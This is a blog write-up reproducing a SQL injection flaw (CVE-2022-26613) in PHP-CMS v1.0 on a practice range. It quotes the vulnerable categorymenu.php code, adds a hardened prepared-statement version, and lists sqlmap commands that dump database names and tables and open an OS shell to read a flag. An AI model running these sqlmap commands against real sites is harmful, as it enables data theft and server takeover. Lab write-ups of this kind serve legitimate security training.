[Vulnerability Reproduction] PHP-CMS v1.0 SQL Injection Vulnerability (CVE-2022-26613)


0x01 Vulnerability Description

Chunqiu Cloud Mirror (春秋云镜) range: PHP-CMS v1.0 contains a SQL injection vulnerability through which an attacker can obtain sensitive information.

CVE: PHP-CMS v1.0 was discovered to contain a SQL injection vulnerability via the category parameter in categorymenu.php.

0x02 Affected Versions

PHP-CMS v1.0

http://pwned_host.com/PHP-CMS-master/categorymenu.php
http://pwned_host.com/PHP-CMS-master/forgot.php
http://pwned_host.com/PHP-CMS-master/post.php
http://pwned_host.com/PHP-CMS-master/search.php

0x03 Vulnerability Analysis

The user controls the category parameter via the GET method, and it is used without any filtering.

Source:

<?php
if(isset($_GET['category'])){
    $post_category_id = $_GET['category'];   // raw user input: no validation, no escaping
}
// The value is interpolated directly into the SQL string; this is the injection point
$query = "SELECT * FROM posts WHERE post_category_id = {$post_category_id} ";
$select_all_posts_count_query = mysqli_query($connection,$query);
$count = mysqli_num_rows($select_all_posts_count_query);
confirm_query($select_all_posts_count_query);
……
// Every row returned by the attacker-controlled query is rendered into the page
while($row = mysqli_fetch_assoc($select_all_posts_count_query)){
    $post_id = $row['post_id'];
    $post_title = $row['post_title'];
    $post_user = $row['post_user'];
    $post_date = $row['post_date'];
    $post_image = $row['post_image'];
    $post_content = $row['post_content'];
?>

For details, see: https://github.com/harshitbansal373/PHP-CMS/issues/14
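As an added example (not code from PHP-CMS or from the original post), this is how the categorymenu.php query above could be hardened: validate that category is an integer and pass it to a mysqli prepared statement instead of interpolating it into the SQL text. It assumes the same $connection handle and posts table as the snippet; the function name fetch_posts_by_category is made up.

```php
<?php
// Added example, not PHP-CMS code. Hardened replacement for the vulnerable
// query in categorymenu.php. Assumes $connection is the site's mysqli handle
// and the posts table/columns from the original snippet.

function fetch_posts_by_category(mysqli $connection, array $get): array
{
    // 1. Validate: category must be a non-negative integer. Anything else
    //    (e.g. "1' OR 1=1--") is rejected before it gets near the database.
    $id = isset($get['category'])
        ? filter_var($get['category'], FILTER_VALIDATE_INT, ['options' => ['min_range' => 0]])
        : false;
    if ($id === false) {
        throw new InvalidArgumentException('invalid category id');
    }

    // 2. Prepared statement: the SQL text is fixed and the value travels as a
    //    typed parameter, so user input can never change the query structure.
    $stmt = $connection->prepare(
        'SELECT post_id, post_title, post_user, post_date, post_image, post_content'
        . ' FROM posts WHERE post_category_id = ?'
    );
    if ($stmt === false) {
        throw new RuntimeException('prepare failed: ' . $connection->error);
    }
    $stmt->bind_param('i', $id);   // 'i' binds the value as an integer
    $stmt->execute();

    $rows = $stmt->get_result()->fetch_all(MYSQLI_ASSOC); // get_result() needs mysqlnd
    $stmt->close();
    return $rows;
}

// Usage in categorymenu.php (replacing the mysqli_query/mysqli_num_rows block):
// $posts = fetch_posts_by_category($connection, $_GET);
// $count = count($posts);
// foreach ($posts as $row) { /* render $row['post_title'] etc. */ }
```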

0x04 Vulnerability Reproduction

Enter the range; the interface looks like this:

Click the #home tag under Categories in the lower-right corner of the page to go to categorymenu.php?category=1; a single-quote test confirms an injection point exists.

Use sqlmap to enumerate the database names

sqlmap -u http://eci-2ze94kj4tmvxvn4d1y45.cloudeci1.ichunqiu.com/categorymenu.php?category=1 --dbs

No obvious flag hint was found, so continue by enumerating the tables of the mysql and cms databases

sqlmap -u http://eci-2ze94kj4tmvxvn4d1y45.cloudeci1.ichunqiu.com/categorymenu.php?category=1 -D mysql --tables
sqlmap -u http://eci-2ze94kj4tmvxvn4d1y45.cloudeci1.ichunqiu.com/categorymenu.php?category=1 -D cms --tables

Guessing that the flag may not be in the database, use the os-shell option to look for /flag directly from the root directory

sqlmap -u http://eci-2ze94kj4tmvxvn4d1y45.cloudeci1.ichunqiu.com/categorymenu.php?category=1 --os-shell

Flag found


posted @ 2023-03-18 16:49  0dot7